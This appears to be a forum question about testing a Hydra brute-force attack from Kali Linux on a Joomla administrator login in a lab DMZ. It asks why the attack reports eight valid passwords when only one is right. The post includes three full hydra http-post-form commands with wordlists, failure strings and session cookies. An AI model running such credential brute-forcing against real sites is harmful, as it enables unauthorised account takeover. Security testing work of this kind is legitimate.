I am actually testing a brute force attack with hydra on a kali linux machine (for educational purposes). I want to find the administrator password of a Joomla website. The Web server is on a dmz and my attacks are sent from the wan (there is a firewall between the subnets)
with the command:
hydra 10.12.14.3 -L login_list.txt -P password_list.txt http-post-form "/administrator/index.php/dvwa/vulnerabilities/brute/index.php:username^USER^&passwd=^PASS^&Login=Log in:Username and password do not match or you do not have an account yet."
this actually send me this
1 of 1 target successfully completed, 8 valid passwords found
Only one password from the list was good. Whith some research on internet, i saw that the problem is probably on the last part where we declare what message comes when a bad combination:
Username and password do not match or you do not have an account yet.
this is what i get when i put a bad login and password on the joomla administrator panel, and it's not a pop-up, only a text message.
I have also tested the next command but there is the same problem:
hydra 10.12.14.3 -L login_list.txt -P password_list.txt http-post-form "/administrator/index.php/dvwa/vulnerabilities/brute/index.php:username^USER^&passwd=^PASS^&Login=Log in:Username and password do not match or you do not have an account yet:H=Cookie: security=low; PHPSESSID=82eac819f87e261479e2e9c743b644a4"
and
hydra 10.12.14.3 -L login_list.txt -P password_list.txt http-post-form "/administrator/index.php/dvwa/vulnerabilities/brute/index.php:username^USER^&passwd=^PASS^&Login=Log in:F=incorrect:H=Cookie: PHPSESSID=82eac819f87e261479e2e9c743b644a4; security=low"
My research was on Internet in general but also in this website. Any solutions worked.